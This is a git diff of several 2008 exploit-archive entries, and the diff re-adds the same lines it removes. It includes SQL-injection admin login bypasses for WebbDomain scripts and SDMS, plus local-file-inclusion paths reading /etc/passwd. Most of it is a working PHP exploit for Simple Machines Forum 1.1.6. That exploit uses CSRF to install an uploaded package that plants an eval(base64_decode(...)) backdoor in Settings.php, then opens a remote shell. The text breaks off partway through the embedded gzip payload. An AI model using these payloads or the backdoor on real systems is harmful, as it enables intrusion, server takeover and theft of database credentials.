+# [~] Script :http://webbdomain.com/php/petition/petition.php
+# [~] Greetz : Allah
+##########################################################################
+
+|| Auth Bypass ||
+
+http://webbdomain.com/php/petition/admin/
+
+Username : admin ' or ' 1=1
+password : Hakxer
+
+Logged In ...
+
+#  Proud To be a Muslim #
+#_=END=_#
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6984.txt b/platforms/php/webapps/6984.txt
index 77a1bf144..d6db6f945 100755
--- a/platforms/php/webapps/6984.txt
+++ b/platforms/php/webapps/6984.txt
@@ -1,27 +1,27 @@
-###########################################################################
-      ______    __  __   ______          __                ______                   
-     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___
-    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
-   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
-  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/
-        /____/       EgY Coders Vulnerability Research TM                                    
-
-# [~] Discovered by : Hakxer
-# [~] Type Gap : WEBBDOMAIN Poll Auth Bypass
-# [~] Script :http://webbdomain.com/php/poll/poll.php
-# [~] Greetz : Allah
-##########################################################################
-
-|| Auth Bypass ||
-
-http://webbdomain.com/php/poll/admin
-
-Username : admin ' or ' 1=1
-password : Hakxer
-
-Logged In ...
-
-#  Proud To be a Muslim #
-#_=END=_#
-
-# milw0rm.com [2008-11-04]
+###########################################################################
+      ______    __  __   ______          __                ______                   
+     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___
+    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
+   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
+  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/
+        /____/       EgY Coders Vulnerability Research TM                                    
+
+# [~] Discovered by : Hakxer
+# [~] Type Gap : WEBBDOMAIN Poll Auth Bypass
+# [~] Script :http://webbdomain.com/php/poll/poll.php
+# [~] Greetz : Allah
+##########################################################################
+
+|| Auth Bypass ||
+
+http://webbdomain.com/php/poll/admin
+
+Username : admin ' or ' 1=1
+password : Hakxer
+
+Logged In ...
+
+#  Proud To be a Muslim #
+#_=END=_#
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6985.txt b/platforms/php/webapps/6985.txt
index ff09d932c..de61c1c3a 100755
--- a/platforms/php/webapps/6985.txt
+++ b/platforms/php/webapps/6985.txt
@@ -1,27 +1,27 @@
-###########################################################################
-      ______    __  __   ______          __                ______                   
-     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___
-    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
-   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
-  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/
-        /____/       EgY Coders Vulnerability Research TM                                    
-
-# [~] Discovered by : Hakxer
-# [~] Type Gap : WEBBDOMAIN Quiz Auth Bypass
-# [~] Script :http://webbdomain.com/php/quizen/
-# [~] Greetz : Allah
-##########################################################################
-
-|| Auth Bypass ||
-
-http://webbdomain.com/php/quizen/admin/
-
-Username : admin ' or ' 1=1
-password : Hakxer
-
-Logged In ...
-
-#  Proud To be a Muslim #
-#_=END=_#
-
-# milw0rm.com [2008-11-04]
+###########################################################################
+      ______    __  __   ______          __                ______                   
+     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___
+    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
+   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
+  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/
+        /____/       EgY Coders Vulnerability Research TM                                    
+
+# [~] Discovered by : Hakxer
+# [~] Type Gap : WEBBDOMAIN Quiz Auth Bypass
+# [~] Script :http://webbdomain.com/php/quizen/
+# [~] Greetz : Allah
+##########################################################################
+
+|| Auth Bypass ||
+
+http://webbdomain.com/php/quizen/admin/
+
+Username : admin ' or ' 1=1
+password : Hakxer
+
+Logged In ...
+
+#  Proud To be a Muslim #
+#_=END=_#
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6986.txt b/platforms/php/webapps/6986.txt
index fd7d20c25..c5a9589e9 100755
--- a/platforms/php/webapps/6986.txt
+++ b/platforms/php/webapps/6986.txt
@@ -1,28 +1,28 @@
-###########################################################################
-      ______    __  __   ______          __                ______                   
-     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___
-    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
-   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
-  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/
-        /____/       EgY Coders Vulnerability Research TM                                    
-
-# [~] Discovered by : Hakxer
-# [~] Type Gap : WEBBDOMAIN Webshop Auth Bypass All Version
-# [~] Script :http://webbdomain.com/php/webshopir/~~All Version ~~
-# [~] Greetz : Allah
-##########################################################################
-
-|| Auth Bypass ||
-
-http://webbdomain.com/php/webshopir/admin V1.2
-http://webbdomain.com/php/webshop/admin V 1.1
-
-Username : admin ' or ' 1=1
-password : Hakxer
-
-Logged In ...
-
-#  Proud To be a Muslim #
-#_=END=_#
-
-# milw0rm.com [2008-11-04]
+###########################################################################
+      ______    __  __   ______          __                ______                   
+     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___
+    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
+   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
+  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/
+        /____/       EgY Coders Vulnerability Research TM                                    
+
+# [~] Discovered by : Hakxer
+# [~] Type Gap : WEBBDOMAIN Webshop Auth Bypass All Version
+# [~] Script :http://webbdomain.com/php/webshopir/~~All Version ~~
+# [~] Greetz : Allah
+##########################################################################
+
+|| Auth Bypass ||
+
+http://webbdomain.com/php/webshopir/admin V1.2
+http://webbdomain.com/php/webshop/admin V 1.1
+
+Username : admin ' or ' 1=1
+password : Hakxer
+
+Logged In ...
+
+#  Proud To be a Muslim #
+#_=END=_#
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6987.txt b/platforms/php/webapps/6987.txt
index 64c727d14..962067131 100755
--- a/platforms/php/webapps/6987.txt
+++ b/platforms/php/webapps/6987.txt
@@ -1,52 +1,52 @@
-SDMS Simple Document Management System v1.1.4 SQL Injection
-___________________________________________________________________________
-
-	Author: Yuri
-
-
-	Program: SDMS Simple Document Management System
-	Version: v1.1.4 (and probably all older versions as well)
-	Website: http://sdms.cafuego.net/
-
-
-How it works
-___________________________________________________________________________
-The login system is very insecure, this is the code we are going to abuse:
-
-	$result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'");
-
-	$row = @mysql_fetch_array($result);
-
-	if( $row[0] != 0 ) {
-
-		header("Location: index.php");
-
-		exit;
-
-	}
-
-	$result = @mysql_query("SELECT id,name FROM users WHERE user='$login'");
-	$row = @mysql_fetch_array($result);
-
-	$id = $row[id];
-
-	$name = $row[name];
-
-If the result of the first query is 0, it selects the id and name from the
-user entered at the login page. There is no filter on $pass.
-
-So if we enter 
-	user: Admin (case insensitive)
-	password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users --
-
-The resulting query looks like this:
-
-	SELECT pass != PASSWORD('') FROM users WHERE id=-1 UNION SELECT 0 FROM users --') FROM users WHERE user='$login'
-
-which is always 0, so voila, admin access.
-
-___________________________________________________________________________
-
-						Yuri // 04 - 11 - 2008
-
-# milw0rm.com [2008-11-04]
+SDMS Simple Document Management System v1.1.4 SQL Injection
+___________________________________________________________________________
+
+	Author: Yuri
+
+
+	Program: SDMS Simple Document Management System
+	Version: v1.1.4 (and probably all older versions as well)
+	Website: http://sdms.cafuego.net/
+
+
+How it works
+___________________________________________________________________________
+The login system is very insecure, this is the code we are going to abuse:
+
+	$result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'");
+
+	$row = @mysql_fetch_array($result);
+
+	if( $row[0] != 0 ) {
+
+		header("Location: index.php");
+
+		exit;
+
+	}
+
+	$result = @mysql_query("SELECT id,name FROM users WHERE user='$login'");
+	$row = @mysql_fetch_array($result);
+
+	$id = $row[id];
+
+	$name = $row[name];
+
+If the result of the first query is 0, it selects the id and name from the
+user entered at the login page. There is no filter on $pass.
+
+So if we enter 
+	user: Admin (case insensitive)
+	password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users --
+
+The resulting query looks like this:
+
+	SELECT pass != PASSWORD('') FROM users WHERE id=-1 UNION SELECT 0 FROM users --') FROM users WHERE user='$login'
+
+which is always 0, so voila, admin access.
+
+___________________________________________________________________________
+
+						Yuri // 04 - 11 - 2008
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6989.txt b/platforms/php/webapps/6989.txt
index 3eff7afb5..ce06527d8 100755
--- a/platforms/php/webapps/6989.txt
+++ b/platforms/php/webapps/6989.txt
@@ -1,16 +1,16 @@
--==============================-
- Autore: x0r - Road Crew 
-Cms: WebbDomain Web Postcards
-Bug: Auth ByPass 
-Site Of Seller: http://webbdomain.com
- -==============================- 
-Exploit: http://webbdomain.com/php/postcarden/admin
-
-Username: admin ' or ' 1=1 
-Pass: x0r 
-
-Live Demo: http://webbdomain.com/php/postcarden/admin/admin.php
- 
-Greetz: La Mia Bimb4...8\10\08 Ti AmO 
-
-# milw0rm.com [2008-11-04]
+-==============================-
+ Autore: x0r - Road Crew 
+Cms: WebbDomain Web Postcards
+Bug: Auth ByPass 
+Site Of Seller: http://webbdomain.com
+ -==============================- 
+Exploit: http://webbdomain.com/php/postcarden/admin
+
+Username: admin ' or ' 1=1 
+Pass: x0r 
+
+Live Demo: http://webbdomain.com/php/postcarden/admin/admin.php
+ 
+Greetz: La Mia Bimb4...8\10\08 Ti AmO 
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6990.txt b/platforms/php/webapps/6990.txt
index 4cf22bfd2..117ce723b 100755
--- a/platforms/php/webapps/6990.txt
+++ b/platforms/php/webapps/6990.txt
@@ -1,24 +1,24 @@
-# ------------------------------------------------------------
-# Sito includefile in PHP Local File Inclusion Vulnerabilities
-# ------------------------------------------------------------
-# Discovered By StAkeR[at]hotmail[dot]it
-# Download On http://www.niclor.net/prodotti/include_Sito_PHP/include_Sito_PHP.zip
-# -----------------------------------------------------------
-
-# File (includefile.php)
-# Register Globals On
-1. 
-
-# includefile.php?page=athos&page_file=../../../../../../etc/passwd
-
-# File (index.php)
-# Magic_Quotes_GPC
-# index.php?id=../../../../../etc/passwd%00 
-
-# milw0rm.com [2008-11-04]
+# ------------------------------------------------------------
+# Sito includefile in PHP Local File Inclusion Vulnerabilities
+# ------------------------------------------------------------
+# Discovered By StAkeR[at]hotmail[dot]it
+# Download On http://www.niclor.net/prodotti/include_Sito_PHP/include_Sito_PHP.zip
+# -----------------------------------------------------------
+
+# File (includefile.php)
+# Register Globals On
+1. 
+
+# includefile.php?page=athos&page_file=../../../../../../etc/passwd
+
+# File (index.php)
+# Magic_Quotes_GPC
+# index.php?id=../../../../../etc/passwd%00 
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6991.txt b/platforms/php/webapps/6991.txt
index fe39c16ea..b3b1545fb 100755
--- a/platforms/php/webapps/6991.txt
+++ b/platforms/php/webapps/6991.txt
@@ -1,94 +1,94 @@
-
-#   URL: http://real.olympe-network.com/
-#
-# Note: other versions are maybe vulnerable, not tested.
-#
-# SMF suffers from multiples vulnerabilities.
-# Combining some of them, we can obtain a remote code execution on the
-# remote host. I won't talk here about all of them, but I'll explain
-# how we can execute code.
-#
-# 0 - UPDATE (05/11/08)
-#
-# (Now,) SMF seems to replace "action=" by "action-" in every URL.
-# But SMF urldecode() GET data, so I replaced "action" by "%61ction".
-# Other little problems have been corrected.
-#
-# Thanks to Alessandro Tagliapietra for his report and his patience.
-#
-# It seems that many people can't use phpreter, so here is a little course :
-#
-# phpreter have 3 modes : cmd (bash), php, and SQL
-#
-# To switch to a mode just type "mode=" (replace  by php, cmd or sql)
-#
-# In cmd mode, you can run bash commands, like "ls"
-# In php mode, you can exec php code like "echo 'abc';"
-# In sql mode, you can exec sql queries and view results, try "SHOW TABLES"
-#
-# I - Session Code
-#
-# SMF administration panel is secured by a "session code", a kind of
-# password that must be provided by the admin browser when the admin
-# is editing data.
-#
-# But the session code is not required for SMF package installation.
-# Just to be clear : you don't need the "session code" to install the
-# package, but you do need a valid admin session.
-#
-# II - Package Installation
-#
-# Package installation works this way :
-# - The admin tells an archive file, which can be either gzip or zip, to SMF
-# - SMF un(g)zip it, and analyse the XML files (yes, it work with XML)
-#   to add, replace or remove code from any SMF source code file.
-#
-# To precise an archive to SMF, the admin is supposed to go on this URL :
-# 
-# http://[website]/SMF/index.php?action=packages;sa=install2;package=[filename] (1)
-#
-# Since $_REQUEST['package'] is not checked, we can install any file
-# on the server, even if the file is not in the Packages/ dir.
-#
-# Using CSRF, we can make an admin to install whatever package we want.
-# That does not seem really interesting for now, but be patient =)
-#
-# III - File upload in SMF; Attachments
-#
-# SMF let users upload files in two cases :
-# - You can upload an image to be your avatar
-# - You can upload attachments to every post you submit
-#
-# Since uploaded images are checked, they don't interest us for now.
-# 
-# Attachments are not checked by SMF.
-# They are renamed and moved to the attachments/ directory.
-# They are renamed this way :
-# [id]_[name]_[ext][md5([name].[ext])]
-#
-# As you can see, there is no rand(), or other strange stuff :
-# we can easily find attachment name.
-#
-# The second part is more interesting now, no ?
-#
-# Now, we can submit a post with a gzip'ed attachment, and make the admin
-# click on a specific link, to install a package we uploaded ourself.
-#
-# I writed "click", so many of you may say "brr, that sucks".
-# So here come the wait-I've-not-finished part.
-#
-# IV - Wait-I've-not-finished part
-#
-# SMF allows us to display remote images in our posts, using [img][/img]
-# We can just set our image URL to ... (1) : when the admin will see our post,
-# the package will be installed.
-#
-# V - Classic Scenario
-#
-# 1. We submit a fantastic post containing our nasty-attached-gzip'ed package, ready
-#    to be installed.
-# 2. We guess the attachment name, that's pretty easy because we can retrieve the
-#    attachment ID.
-# 3. We modify our post, adding an [img](1)[/img], replacing [filename] by 
-#    ../attachments/[the_name_you_just_found]
-# 4. The administrator discover our fantastic post on his fantastic forum ...
-# 5. His browser discovers our image : it goes to the specified url to download it.
-#    wooops. The package is installed.
-#
-# VI - Exploit
-#
-# The exploit will login with your user account, and submit a new post/topic containing an
-# attachment, a gzipped package, which permits remote code execution once installed.
-# Then it will obtain the attachment ID, determine attachment name, and modify your topic to
-# add a remote image (using [img][/img]).
-# Then you'll have to wait for an admin to see your post ... and the package will be installed.
-#
-# VII - Notes
-#
-# - Do not forget to change SUBJECT and MESSAGE constants, to make your post a little more realistic.
-# - The current gzipped package is supposed to put PHP code at the end of Settings.php file.
-# - Code: if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); }
-#
-# First run the exploit like this :
-# eg : php exploit.php -url http://localhost/forum/ -bid 2 -user tester:passwd
-# And when you think the admin viewed your post, run the shell :)
-# eg : php exploit.php -url http://localhost/forum/ -shell
-#
-# FOR EDUCATIONAL PURPOSE ONLY
-#
-
-new smf_poc();
-
-class smf_poc
-{
-	const SUBJECT = 'hello';
-	const MESSAGE = 'dudes ... I love your forum ;)';
-	
-	function smf_poc()
-	{
-		$this->header();
-		$this->gzip();
-		$this->loadparameters();
-		$this->wwwinit();
-		
-		if(!$this->shell)
-		{
-			# First of all, login
-			$this->login();
-			# Then submit a topic
-			$this->submit_post();
-			# Find attachment name and message id
-			$this->get_postinfo();
-			# and modify the post
-			$this->edit_post();
-			# finally ... wait.
-			$this->wait();
-		}
-		else
-			$this->shell();
-	}
-	
-	function header()
-	{
-		$this->msg();
-		$this->msg('  Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit');
-		$this->msg('    by Charles FOL ');
-		$this->msg();
-	}
-	
-	function msg($msg = '', $exit = 0)
-	{
-		print '# ' . $msg . "\n";
-		
-		if($exit)
-		{
-			$this->msg();
-			exit();
-		}
-	}
-	
-	function usage()
-	{
-		global $argv;
-		
-		$name = basename($argv[0]);
-		
-		$this->msg('usage : php ' . $name . ' -url [url] -bid [bid] -user [user]:[passwd]');
-		$this->msg('   OR   php ' . $name . ' -url [url] -shell');
-		$this->msg();
-		$this->msg('Parameters are :');
-		$this->msg(' -shell            Test if the shell is installed, and load phpreter');
-		$this->msg(' -bid (int)        The board ID were you want to submit the topic');
-		$this->msg(' -user user:passwd A valid user:password couple');
-		$this->msg(' -wait             Flood control time (default: 5)');
-		$this->msg();
-		$this->msg('eg : php ' . $name . ' -url http://localhost/forum/ -bid 2 -user tester:passwd', 1);
-	}
-	
-	# Get every needed parameters, and load defaults
-	function loadparameters()
-	{
-		$this->furl  = $this->getparameter('url');
-		$this->shell = $this->getoption('shell');
-		$this->wait  = $this->getparameter('wait', 5);
-		
-		if(!$this->shell)
-		{
-			$this->bid  = $this->getparameter('bid');
-			$this->user = $this->getparameter('user');
-		}
-	}
-	
-	# Patience ...
-	function wait()
-	{
-		$this->url->topic = $this->pid;
-		$this->makeurl();
-		
-		$this->msg();
-		$this->msg('Now, you just have to wait for an admin to see your post,');
-		$this->msg('then you will be able to launch a shell using -shell.');
-		$this->msg();
-		$this->msg('Post URL : ' . $this->murl, 1);
-	}
-	
-	# Check if a shell is available and launch phpreter
-	function shell()
-	{
-		$this->www->addheader('Shell', 'MTs=');
-		
-		$this->url->action = 'forum';
-		$this->get();
-		
-		if(!$this->match('(12345678901234567890)'))
-			$this->msg('Shell is not available', -1);
-		
-		$sql = array
-		(
-			'var_host'   => '$db_server',
-			'var_user'   => '$db_user',
-			'var_passwd' => '$db_passwd',
-			'var_db'     => '$db_name'
-		);
-		
-		$preter = new phpreter($this->murl, '1234567890(.*)1234567890', 'cmd', $sql);
-	}
-	
-	function wwwinit()
-	{
-		$this->www = new phpsploit();
-		$this->www->cookiejar(1);
-		$this->www->addheader('Referer', $this->furl . 'index.php');
-	}
-	
-	# Log in ...
-	function login()
-	{
-		$user = explode(':', $this->user);
-		
-		$this->url  = 'action=login2';
-		$this->data = 'user='.$user[0].'&passwrd='.$user[1].'&cookielength=-1';
-		$this->post();
-		
-		$this->location->action = 'login2';
-		$this->location->sa     = 'check';
-		
-		if($this->location())
-			$this->msg('Logged in as ' . $user[0]);
-		else
-			$this->msg('Can\'t log in', 1);
-	}
-	
-	# Get seqnum and sescode
-	function get_sessionvars()
-	{
-		$this->get();
-		
-		$this->scode = $this->match('name="sc" value="([0-9a-f]+)"', 1);
-		$this->sqnum = $this->match('name="seqnum" value="([0-9]+)"', 1);
-	}
-	
-	# Submit our post, containing our gzipped package
-	function submit_post()
-	{
-		# Flood control: let's sleep a little
-		
-		$this->msg('Waiting ' . $this->wait . ' secs (flood control)');
-		sleep($this->wait);
-		
-		# Obtain session vars
-		
-		$this->url->action = 'post';
-		$this->url->board  = $this->bid . '.0';
-		
-		$this->get_sessionvars();
-		
-		# and submit the post
-		
-		$this->url->action = 'post2';
-		$this->url->board  = $this->bid;
-		$this->url->start  = '0';
-		
-		$this->data = array
-		(
-			'subject'            => self::SUBJECT,
-			'message'            => self::MESSAGE,
-			'sc'                 => $this->scode,
-			'seqnum'             => $this->sqnum,
-			'icon'               => 'xx',
-			'topic'              => 0,
-			'notify'             => 0,
-			'lock'               => 0,
-			'sticky'             => 0,
-			'move'               => 0,
-			'additional_options' => 0,
-			'attachment[]'       => array
-			(
-				frmdt_filename => 'jpeg.jpg',
-				frmdt_type     => 'image/jpeg',
-				frmdt_content  => $this->GZIP,
-			)
-		);
-		
-		$this->post();
-		
-		# Check the submission
-		
-		$this->location->board = $this->bid;
-		
-		if($this->location())
-		{
-			$this->msg('Post successfully submitted');
-		}
-		else
-		{
-			$this->msg('Error while posting');
-			$this->msg('Try augmenting -wait parameter', 1);
-		}
-		
-		# Find the post id
-		
-		$this->url->board = $this->bid . '.0';
-		$this->get();
-		
-		$this->pid = $this->match('topic=([0-9]+)');
-		$this->pid = max($this->pid);
-	}
-	
-	# Get the avatar ID to obtain its full name, and get msg id
-	function get_postinfo()
-	{
-		$this->url->topic = $this->pid . '.0';
-		$this->get();
-		
-		$this->aid = $this->match('attach=([0-9]+)', 1);
-		$this->mid = $this->match('msg=([0-9]+)', 1);
-		
-		if($this->aid)
-			$this->msg('Got attachment name =)');
-		else
-			$this->msg('Unable to obtain attachment ID ...', 1);
-		
-		if(!$this->mid)
-			$this->msg('Unable to obtain message ID ...', 1);
-	}
-	
-	# Edit our precedent post : just add our "image".
-	function edit_post()
-	{
-		# Obtain session vars
-		
-		$this->url->action = 'post';
-		$this->url->topic  = $this->pid;
-		$this->url->msg    = $this->mid;
-		$this->url->sesc   = $this->scode;
-		
-		$this->get_sessionvars();
-		
-		# Build our CSRF
-		
-		$this->url->{'%61ction'} = 'packages';
-		$this->url->sa           = 'install2';
-		$this->url->package      = $this->aid . '_jpeg_jpg' . md5('jpeg.jpg');
-		$this->url->package      = '../attachments/' . $this->url->package;
-		
-		$this->makeurl();
-		
-		$img = '[img]' . $this->murl . '[/img]';
-		
-		# Edit the post
-		
-		$this->url->action = 'post2';
-		$this->url->sesc   = $this->scode;
-		$this->url->board  = $this->bid;
-		$this->url->msg    = $this->mid;
-		$this->url->start  = 0;
-		
-		$this->data = array
-		(
-			'topic'              => $this->pid,
-			'subject'            => self::SUBJECT,
-			'icon'               => 'xx',
-			'message'            => self::MESSAGE . $img,
-			'notify'             => '0',
-			'lock'               => '0',
-			'goback'             => '1',
-			'sticky'             => '0',
-			'move'               => '0',
-			'attach_del[]'       => '0',
-			'attach_del[]'       => $this->aid,
-			'post'               => 'Save',
-			'num_replies'        => '0',
-			'additional_options' => '0',
-			'sc'                 => $this->scode,
-			'seqnum'             => $this->sqnum,
-		);
-		
-		$this->post();
-		
-		if($this->location(';topic=' . $this->pid))
-			$this->msg('Post successfully edited, everything done.');
-		else
-			$this->msg('Unable to edit the post');
-	}
-	
-	# Find were we are redirected to
-	function location()
-	{
-		# SMF likes making a mess with URL, so ... let's consider
-		# all cases.
-		
-		$expr = '';
-		
-		$this->location = (array) $this->location;
-		
-		foreach($this->location as $key => $value)
-		{
-			$expr .= $key . '[,=]' . urlencode($value) . '(&|;|%26|%3B)';
-		}
-		
-		$this->location = null;
-		
-		$expr = substr($expr, 0, -13);
-		$expr = '#(Refresh|Location):.*' . $expr . '#i';
-		
-		$head = $this->www->getheader();
-
-		return preg_match($expr, $head);
-	}
-	
-	function match($expr, $one = 0)
-	{
-		# SMF likes making a mess with URL, so ... let's consider
-		# all cases.
-		
-		$expr = str_replace('\?', '[\?/]', $expr);
-		$expr = str_replace('=', '[,=]', $expr);
-		$expr = str_replace(';', '(&|;|%26|%3B)', $expr, $count);
-		$expr = '#' . $expr . '#is';
-		
-		$count++;
-		
-		$http = $this->www->getcontent();
-		
-		if(!$one && !preg_match_all($expr, $http, $match))
-			return false;
-
-		if($one && !preg_match($expr, $http, $match))
-			return false;
-		
-		return $match[$count];
-	}
-	
-	function getoption($option)
-	{
-		global $argv, $argc;
-		
-		foreach($argv as $arg)
-		{
-			if($arg == '-' . $option)
-				return true;
-		}
-		
-		return false;
-	}
-	
-	function getparameter($parameter, $default = false)
-	{
-		global $argv, $argc;
-		
-		for($i=0;$i<$argc;$i++)
-		{
-			if($argv[$i] == '-' . $parameter)
-				return $argv[$i+1];
-		}
-		
-		if($default === false)
-			$this->usage();
-		
-		return $default;
-	}
-	
-	function get()
-	{
-		$this->makeurl();
-		$this->www->get($this->murl);
-	}
-	
-	function post()
-	{
-		$this->makeurl();
-		
-		if(is_array($this->data))
-		{
-			$this->data['frmdt_url'] = $this->murl;
-			
-			$this->www->formdata($this->data);
-		}
-		else
-			$this->www->post($this->murl, $this->data);
-	}
-	
-	# Construct a valid URL using the url object/string.
-	function makeurl()
-	{
-		$url = '';
-		
-		if(is_object($this->url))
-		{
-			$url = '';
-			
-			$this->url = (array) $this->url;
-			
-			foreach($this->url as $key => $value)
-			{
-				$url .= $key . '=' . urlencode($value) . '&';
-			}
-				
-			$url = substr($url, 0, -1);
-		}
-		else 
-			$url = $this->url;
-			
-		$url = $this->furl . 'index.php?' . $url;
-		
-		$this->murl = $url;
-		
-		$this->url = null;
-	}
-	
-	# Our SMF package ...
-	function gzip()
-	{
-		$this->GZIP = ''
-		. "\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x0b\xed\x56\xff\x4f"
-		. "\xda\x40\x14\xe7\x57\x4c\xfc\x1f\x9e\x64\x89\x98\x08\x6d"
-		. "\x01\xcb\x86\xa5\xc6\x29\x8b\x26\x7e\x8b\x34\x4b\x8c\x31"
-		. "\xe4\xa0\x87\xdc\x6c\xef\x9a\xde\x21\x92\x65\xff\xfb\xde"
-		. "\x5d\x71\x52\xdd\x37\x12\x37\x17\xc7\xa3\x69\xb9\xbb\xf7"
-		. "\x5e\xdf\xd7\xcf\x2b\xe3\x52\x91\x28\xaa\xde\xc5\x51\xe1"
-		. "\x4f\x91\x63\xdb\xae\xeb\x42\xc1\x36\xf4\xf0\x84\x8c\x6a"
-		. "\x8d\xad\x26\x38\x8e\x63\xd7\xeb\x76\xdd\x6d\xd6\x00\x1c"
-		. "\xdb\x6d\x3a\x50\xf8\x2b\x34\x46\xff\x53\x34\x29\x15\x42"
-		. "\x15\xfe\x3f\xf2\x76\x30\xf3\x70\x4b\x53\xc9\x04\x6f\x97"
-		. "\x9c\xaa\x5d\xda\xf1\x57\x57\xbc\xb5\xfd\xd3\xbd\xe0\xe2"
-		. "\xac\x03\xb1\x08\xd9\x90\x0d\x88\xc2\x73\xe8\x5e\x74\x83"
-		. "\xce\x31\x94\x46\x4a\x25\x2d\xcb\x9a\x4c\x26\x55\xc9\xe2"
-		. "\x24\xa2\x31\x19\x8c\x18\xa7\xb2\x2a\xd2\x6b\x0b\x35\x5a"
-		. "\xf3\x62\x25\xa3\xb0\x52\x81\x67\xfc\xad\xae\x14\x83\x11"
-		. "\x93\x80\x17\xe1\x40\xef\x88\xb6\x22\x6f\xec\x90\xe1\xce"
-		. "\x50\xa4\xd0\x3d\xfe\x00\x09\x19\xdc\x90\x6b\x34\x70\x75"
-		. "\x05\x45\x77\x83\xa0\x73\x12\x1c\x9e\x9e\xb4\xe0\x70\x08"
-		. "\x53\x31\x06\x92\x52\x50\xe9\x94\xf1\x6b\x50\x02\x58\xd6"
-		. "\x15\xa0\xf4\x2b\x62\xc2\xc7\xb8\x98\x6e\x1a\x46\x39\x12"
-		. "\xe3\x28\xd4\xbc\xa8\x47\x8d\xe8\xbd\x66\xcd\x86\x8f\xb4"
-		. "\x0a\x5a\x25\x53\x30\x61\xa8\x80\x0b\xfc\x23\xd2\x1b\x63"
-		. "\x07\x8a\x6f\x02\x9a\x49\x24\xbe\x8b\xdc\x50\x20\x10\x09"
-		. "\x71\x83\x7a\x88\x02\xad\x6a\x28\xa2\x48\x4c\xb4\x0d\x9a"
-		. "\x9d\x71\xbc\xc7\x99\x2f\x78\x19\x5b\xb2\x9d\x16\x8a\x14"
-		. "\x67\x39\x40\x97\xe5\xf7\x92\x10\x8a\x81\xb4\x32\xd3\x2b"
-		. "\x33\x77\xaa\xc9\x28\xd1\xee\xb7\x9f\x99\x4c\x48\x8f\x1f"
-		. "\x87\x5e\xc2\x00\x33\xd3\xa7\x30\x96\x34\xd4\x41\x35\xc9"
-		. "\x99\xce\xce\xa4\x40\x87\x32\xb7\xa7\x10\x0a\x98\xe0\x02"
-		. "\xb5\x60\x88\xd2\x6f\x11\xe5\x94\x86\x52\x73\xc4\x5a\x1c"
-		. "\x99\xf0\x6e\x82\x99\xa4\x22\xa1\x69\x34\x35\xc9\x84\x67"
-		. "\xad\xab\x8a\xaf\x75\x7a\xb9\x42\xc2\x7a\xe6\xb2\xbd\x68"
-		. "\xd1\x67\x62\x2d\x19\x0f\x7f\x25\xaa\xfb\xa3\x68\x1a\x24"
-		. "\x2b\xe9\xb9\xbc\xcf\x42\x20\x74\x1c\x75\x85\x48\x12\x63"
-		. "\xd9\xc8\x2c\x76\x8c\xc3\x5c\x01\x56\xb4\x9c\xc6\xf1\x6a"
-		. "\xe6\x45\xd1\x63\xa1\xdf\x27\xfd\x4f\x63\xc9\x5a\x7d\xc2"
-		. "\x39\x0d\x7b\x31\x8d\xfb\xd8\xea\x3d\x72\x4b\x10\xf5\x3c"
-		. "\x0b\x39\x34\xe3\xac\xfd\x7d\xbb\xea\x78\xd6\xfd\xc2\x64"
-		. "\xd5\x33\x4d\xc4\xf1\xad\xed\x52\x97\x2a\x85\xb5\x29\x75"
